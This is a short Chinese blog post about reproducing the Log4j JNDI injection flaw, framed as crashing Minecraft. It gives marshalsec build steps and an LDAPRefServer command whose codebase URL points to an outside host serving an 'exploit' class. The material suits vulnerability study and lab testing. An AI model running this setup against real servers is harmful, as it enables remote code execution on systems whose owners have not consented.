简介
最近Log4j漏洞真的很火!而且让很多安全工作者都对JNDI注入产生了浓厚的兴趣,今天给大家看一个视频,顺便附上复现的简单代码以及项目地址,如果感兴趣可以自己在内网尝试一下!
视频演示
相关截图
![图片[1]-如何在1秒钟之内让MineCraft瘫痪?最新Log4j漏洞复现视频-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/12/20211215145332426-1024x525.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
复现方法
- 需要 Java 8,使用 maven 构建
mvn clean package -DskipTests
。 - 注意:高于 6u211、7u201、8u191 和 11.0.1 的 JDK 版本不受 LDAP 攻击影响,不要因为装错JDK版本吐槽代码不能运行
运行POC
注:在windows电脑上运行貌似无需-cp即可运行
java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.(LDAP | RMI)RefServer < codebase > # <class> [<port>]
上述视频中的运行POC参考
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://145.239.88.127/#exploit"
更多补充资料
- 如果上面的教程您觉得太简单了,缺乏实操,可以参考下面的另一个项目
- 下面的项目也有对应的视频演示
- 分享您的复现过程
如果你对上面的视频感兴趣,想自己复现一下,并且复现成功了,欢迎在社区投稿
© 版权声明
THE END
- 最新
- 最热
只看作者